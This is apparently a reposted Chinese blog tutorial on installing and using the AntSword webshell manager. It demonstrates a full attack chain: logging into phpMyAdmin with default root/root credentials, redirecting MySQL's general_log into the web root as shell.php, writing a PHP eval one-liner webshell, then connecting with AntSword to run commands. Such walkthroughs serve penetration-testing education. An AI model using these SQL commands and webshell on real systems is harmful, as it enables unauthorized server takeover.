当前位置:   article > 正文

Web安全-AntSword(中国蚁剑)Webshell管理工具使用

中国蚁剑

为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓

01 工具下载地址

https://github.com/AntSwordProject/
  • 1

蚂剑工具的下载分为两个部分,一个是项目核心源码antSword,另一个是加载器AntSword-Loader。我们依次进行下载,并且进行说明

在这里插入图片描述

先点击进入antSword,点击页面右侧"releases",进入工具的源码下载页面进行源码下载。

在这里插入图片描述

在这里插入图片描述
而后点击进入AntSword-Loader,点击页面右侧"releases",进入加载器下载页面,根据操作系统类型选择对应的加载器,此处以Windows举例。

在这里插入图片描述

下载完毕后,解压加载器的压缩包,双击打开AntSword.exe,出现如下图界面后,加载对应antSword地址即可

在这里插入图片描述



02 工具介绍




AntSword是一个开源、跨平台的webshell管理工具,旨在满足渗透测试人员、具有权限和/或授权的安全研究人员以及网站管理员的需求。


03 使用案例

攻击者成功利用弱口令root/root登录phpmyadmin 后台后,利用 SQL 语句 show variables like ‘%general%’;查看general log 是否开启

在这里插入图片描述


若发现日志读写功能关闭,于是使用 SQL 语句:SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’;打开general_log 日志读写功能。

在这里插入图片描述

打开日志读写功能后,根据图中 general_log_file 中的绝对路径制作一个木马文件:SET GLOBAL general_log_file=‘C:/phpStudy/www/shell.php’

在这里插入图片描述

接着往 shell.php 写入 SELECT '<?php eval($_POST["jkxy"]);?>

在这里插入图片描述

利用中国蚁剑工具连接一句话 shell.php,双击运行AntSword.exe,等初始化完成后,再双击“AntSword.exe”即可正常启动,页面功能如图所示:

在这里插入图片描述

shell列表区鼠标右键选择添加webshell数据:

在这里插入图片描述


配置相关参数信息后连接测试成功,打开虚拟终端,输入命令 whoami,发现命令执行成功。

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
至此攻击者通过蚂剑连接Webshell,成功获取服务器权限,后续的执行命令、文件管理、其他功能都在界面中可以进行选择:

这里对功能模块做一个简单的介绍说明:

序号模块名称功能介绍
1文件管理文件管理是 AntSword 的几大职能之一,主要涉及文件的逻辑组织和物理组织,目录的结构和管理。
2虚拟终端虚拟终端是 AntSword 的几大职能之一,利用 Shell 模拟终端,在远程计算机上运行应用程序,就像他们是坐在这台计算机前面一样。
3数据库管理数据库管理是 AntSword 的几大职能之一,通过图形化的管理界面,利用 Shell 转发功能,对远程服务器上的数据库进行快速、高效的管理
4文件管理可视化管理文件的增删改查等操作
6插件市场插件开发者将插件提交至「插件市场」后,使用者可轻松获取并使用插件。

04 参考资料

蚁剑官方文档

https://www.yuque.com/antswordproject/antsword/lmwppk
  • 1
  • 2
  • 3
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/623678
推荐阅读
相关标签
  

闽ICP备14008679号